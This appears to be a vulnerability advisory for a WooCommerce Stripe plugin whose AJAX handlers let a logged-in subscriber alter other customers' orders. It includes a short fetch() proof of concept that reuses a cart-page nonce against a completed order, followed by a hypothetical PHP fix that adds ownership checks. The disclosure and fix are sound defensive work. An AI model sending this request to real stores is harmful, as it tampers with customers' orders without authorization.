The plugin does not properly restrict users from making a certain set of changes to other customers’ orders.
Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax
As a subscriber, go to the cart page (e.g. https://example/cart/) and grab the updateFailedOrderNonce nonce, then send the request below (42 being a Completed order ID):
// Replace NONCE with the updateFailedOrderNonce value taken from the cart page.
fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
  "credentials": "include" // send the logged-in subscriber's session cookie
}).then(response => response.text())
  .then(data => console.log(data));
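The root cause is that a valid nonce is accepted as sufficient authorization for a client-supplied order_id. Below is an added example of the ownership check such a handler needs; it is not the plugin's code or its actual fix, and the action name, function names and meta key are hypothetical.

```php
<?php
// Added example (not the plugin's code): a hypothetical WooCommerce AJAX
// handler that acts on a client-supplied order_id. All names are assumptions.
add_action( 'wc_ajax_example_update_failed_order', 'example_update_failed_order_ajax' );

function example_update_failed_order_ajax() {
    // A nonce only proves the request came from a page this site served to the
    // browser (CSRF protection). It says nothing about who owns the order, so an
    // ownership check is still required.
    check_ajax_referer( 'example-update-failed-order', '_wpnonce' );

    $order_id = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
    $order    = $order_id ? wc_get_order( $order_id ) : false;
    if ( ! $order ) {
        wp_send_json_error( array( 'message' => 'Invalid order.' ), 400 );
    }

    // Authorization: the caller must own the order.
    if ( ! example_current_user_owns_order( $order ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // State check: a completed order should not be touched by a "failed order"
    // path at all, so restrict the action to statuses where it makes sense.
    if ( ! $order->has_status( array( 'pending', 'failed' ) ) ) {
        wp_send_json_error( array( 'message' => 'Order cannot be updated.' ), 409 );
    }

    $intent_id = isset( $_POST['intent_id'] )
        ? sanitize_text_field( wp_unslash( $_POST['intent_id'] ) )
        : '';
    $order->update_meta_data( '_example_intent_id', $intent_id ); // hypothetical key
    $order->save();
    wp_send_json_success();
}

// True when the logged-in user is the order's customer, or, for a guest order,
// when it is the order awaiting payment in the caller's own checkout session.
function example_current_user_owns_order( WC_Order $order ) {
    $customer_id = $order->get_customer_id();
    if ( $customer_id ) {
        return is_user_logged_in() && get_current_user_id() === $customer_id;
    }
    return WC()->session
        && (int) WC()->session->get( 'order_awaiting_payment' ) === $order->get_id();
}
```

WooCommerce also exposes a `view_order` meta capability, so `current_user_can( 'view_order', $order_id )` is an equivalent way to express the ownership test for logged-in customers.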